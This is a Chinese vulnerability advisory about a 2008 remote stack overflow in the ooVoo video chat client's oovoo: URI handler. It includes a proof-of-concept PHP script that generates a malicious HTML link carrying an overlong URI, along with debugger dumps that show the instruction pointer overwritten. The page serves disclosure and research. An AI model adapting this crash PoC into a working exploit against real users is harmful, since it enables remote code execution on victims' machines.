安全研究
安全漏洞
ooVoo URI处理器远程栈溢出漏洞
发布日期:2008-11-11
更新日期:2008-11-13
受影响系统:
ooVoo LLC ooVoo 1.7.1.57描述:
ooVoo LLC ooVoo 1.7.1.35
BUGTRAQ ID: 32251
ooVoo是免费的视频聊天工具。
ooVoo在处理命令行参数时存在栈溢出漏洞。如果用户受骗访问了恶意网页并向ooVoo: URI处理器传送了超长字符串的话,就可能触发这个溢出,导致执行任意指令。
<*来源:bruiser
链接:http://secunia.com/advisories/32698/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
ooVoo 1.7.1.35 (URL Protocol) remote unicode buffer overflow poc
by Nine:Situations:Group::bruiser
tested against IE8b/xp sp3
9sg site: http://retrogod.altervista.org/
software site: http://www.oovoo.com/
description: ooVoo is a startup video conferencing and instant messaging
application, similar to Skype Video.[1] ooVoo allows video chats with up to 6
participants, and unlike Skype Video, does not use a P2P network.[..]
faultmon dump of oovoo.exe processing the url given:
...
04:22:10.875 pid=0E10 tid=0C08 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [0000005A])
----------------------------------------------------------------
EAX=00000066: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00133D44: 6F 00 6F 00 76 00 6F 00-6F 00 3A 00 00 00 0F 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=01D0DC28: 63 00 61 00 6C 00 6C 00-74 00 6F 00 3A 00 00 00
ESP=00133D00: 12 4E 43 00 AA A8 39 06-FF FF FF FF 01 00 00 00
EBP=00133F68: 63 00 63 00 63 00 64 00-64 00 64 00 64 00 65 00
ESI=00133F84: 66 00 00 00 68 B6 A2 01-00 00 00 00 00 00 00 00
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=0040DF5A: 3B 48 F4 7F 16 52 8D 04-48 50 E8 89 9A 3F 00 83
--> CMP ECX,[EAX-0C]
----------------------------------------------------------------
04:22:12.015 pid=0E10 tid=0C08 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [00000000])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00
EDX=7C9132BC: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=00133930: A8 32 91 7C 18 3A 13 00-5C 3F 13 00 34 3A 13 00
EBP=00133950: 00 3A 13 00 7A 32 91 7C-18 3A 13 00 5C 3F 13 00
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00
--> ADD [EAX],AL
----------------------------------------------------------------
...
additional notes:
oovoo.exe, compiled with /SafeSEH=OFF
reg key:
HKEY_CLASSES_ROOT\ooVoo\shell\open\command
"e:\oovoo\oovoo.exe" "%1"
*/
$bof="<html><a target=\"_blank\" href=\"oovoo:?" . str_repeat("\x0f",258).
"bbbbaaaaccccddddeeeeffff".
"\">click me</a></html>";
$fp=fopen("oovoo_poc.html","w+");
fputs($fp,$bof);
fclose($fp);
?>
建议:
厂商补丁:
ooVoo LLC
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.oovoo.com
浏览次数:3128
严重程度:0(网友投票)
绿盟科技给您安全的保障